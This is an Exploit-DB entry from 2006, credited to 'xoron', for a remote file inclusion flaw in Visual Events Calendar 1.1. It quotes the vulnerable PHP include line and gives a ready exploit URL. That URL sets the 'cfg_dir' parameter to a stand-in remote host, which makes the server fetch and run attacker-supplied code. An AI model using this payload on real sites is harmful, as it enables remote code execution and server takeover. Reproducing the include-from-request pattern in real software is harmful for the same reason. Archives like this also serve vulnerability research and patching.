Visual Events Calendar 1.1 - 'cfg_dir' Remote File Inclusion

EDB-ID:

2141




Platform:

PHP

Date:

2006-08-07


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#title: Visual Events Calendar v1.1   (cfg_dir) Remote Inclusion Vulnerability

#Author: xoron

#script: Visual Events Calendar v1.1

#Class : Remote

#cont@ct: x0r0n[at]hotmail[dot]com

#CODE:    include $cfg_dir."customize_text.php";

#Exploit: http://www.site.com/[path]/calendar.php?cfg_dir=http://evil_scripts?

#Thanx : WWW.CYBER-WARRiOR.ORG

#Greetz: str0ke, ShiKaA , DJR , x-mastER ,R3D4c!D ,

# milw0rm.com [2006-08-07]